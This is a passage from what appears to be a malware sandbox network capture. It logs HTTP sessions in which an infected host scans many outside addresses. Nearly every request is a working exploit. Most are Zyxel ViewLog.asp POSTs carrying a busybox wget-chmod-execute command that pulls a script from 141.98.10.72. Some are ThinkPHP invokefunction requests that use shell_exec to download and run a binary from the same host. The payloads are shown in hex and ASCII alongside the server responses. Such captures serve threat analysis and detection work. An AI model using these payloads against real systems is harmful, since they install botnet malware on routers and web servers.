                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1306192.168.2.145327085.244.89.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.705610991 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:59.921385050 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:56 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 288
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1307192.168.2.143370262.29.12.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.739963055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1308192.168.2.144396894.122.234.638080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.740046978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1309192.168.2.144103485.175.99.918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.753778934 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.016949892 CET274INHTTP/1.0 200 OK
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Wed, 14 Feb 2024 08:35:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1310192.168.2.143353231.136.251.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.927539110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.609914064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.953907967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.705856085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:10.081470966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1311192.168.2.145994895.100.64.13780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.947602987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.159984112 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 32 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 30 26 23 34 36 3b 34 35 37 34 61 32 35 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;927a7b5c&#46;1707899760&#46;4574a25f</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1312192.168.2.145957295.111.240.25080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.949912071 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.158593893 CET513INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Server: Apache/2.4.29 (Ubuntu)
                                                        Content-Length: 319
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 69 34 31 39 37 33 35 2e 63 6f 6e 74 61 62 6f 73 65 72 76 65 72 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at vmi419735.contaboserver.net Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1313192.168.2.145010295.216.64.12280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.965898991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.191474915 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1314192.168.2.143943095.131.234.11680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.972042084 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.205692053 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:59 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1315192.168.2.144602895.217.210.7080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.975935936 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.211133003 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1316192.168.2.144585294.120.52.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:59.989053011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1317192.168.2.144280831.200.31.418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.003350019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1318192.168.2.145188085.105.221.708080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.005552053 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.258881092 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:22 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1319192.168.2.144106685.175.99.918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.268482924 CET334INHTTP/1.0 400 Bad Request
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Wed, 14 Feb 2024 08:35:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1320192.168.2.144392262.210.182.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.331640005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.534173965 CET498INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:33 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
